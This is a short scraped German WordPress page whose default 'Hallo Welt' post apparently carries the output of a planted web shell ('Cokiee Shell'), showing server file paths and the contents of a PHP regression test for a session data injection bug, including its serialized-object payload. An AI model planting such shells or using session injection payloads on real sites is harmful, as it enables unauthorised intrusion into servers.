Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/session/tests/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/session/tests/bug72681.phpt |
--TEST-- Bug #72681: PHP Session Data Injection Vulnerability --SKIPIF-- <?php include('skipif.inc'); ?> --FILE-- <?php ini_set('session.serialize_handler', 'php'); session_start(); $GLOBALS['ryat'] = $_SESSION; $_SESSION['ryat'] = 'ryat|O:8:"stdClass":0:{}'; session_write_close(); session_start(); var_dump($ryat); var_dump($_SESSION); ?> --EXPECT-- array(0) { } array(1) { ["ryat"]=> string(24) "ryat|O:8:"stdClass":0:{}" }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare